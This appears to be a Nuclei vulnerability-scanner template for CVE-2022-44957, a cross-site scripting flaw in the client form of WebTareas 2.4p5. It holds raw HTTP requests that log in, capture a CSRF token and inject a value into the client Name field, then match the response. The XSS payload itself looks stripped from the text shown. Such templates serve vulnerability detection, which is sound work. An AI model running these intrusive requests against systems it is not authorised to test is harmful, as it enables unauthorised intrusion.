id: CVE-2022-44957 info: name: WebTareas 2.4p5 - Cross-Site Scripting author: theamanrawat severity: medium description: | webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. reference: - http://webtareas.com/ - https://github.com/anhdq201/webtareas/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2022-44957 - http://webtareas.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-44957 cwe-id: CWE-79 epss-score: 0.00091 epss-percentile: 0.39059 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: webtareas_project product: webtareas tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project http: - raw: - | POST /general/login.php?session=false HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="action" login -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginForm" {{username}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="passwordForm" {{password}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginSubmit" Log In -----------------------------3023071625140724693672385525-- - | GET /clients/editclient.php? HTTP/1.1 Host: {{Hostname}} - | POST /clients/editclient.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061 -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="csrfToken" {{csrf}} -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="action" add -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="cown" 1 -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="cn" {{randstr}}
-----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="add" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="zip" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="ct" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="cou" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="wp" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="fa" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="url" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="email" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="curr" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="wc" 1 -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="pym" 1 -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="pyt" 7 -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="c" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="ssc" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="file1"; filename="" Content-Type: application/octet-stream -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="attnam1" -----------------------------34025600472463336623659912061 Content-Disposition: form-data; name="atttmp1" -----------------------------34025600472463336623659912061-- host-redirects: true matchers-condition: and matchers: - type: word part: body_3 words: - '
' - 'clients/listclients.php?' condition: and - type: word part: header_3 words: - text/html extractors: - type: regex name: csrf group: 1 regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true # digest: 4b0a00483046022100b4a13ff7bbbcf2d7e1b9b282d20b180d7d41aed95b378f25b5c10ff31ec0733d022100f911e14dc71efd6ca82157416ed0b18b686711bd881b9c5b9bfe08a99b67f699:922c64590222798bb761d5b6d8e72950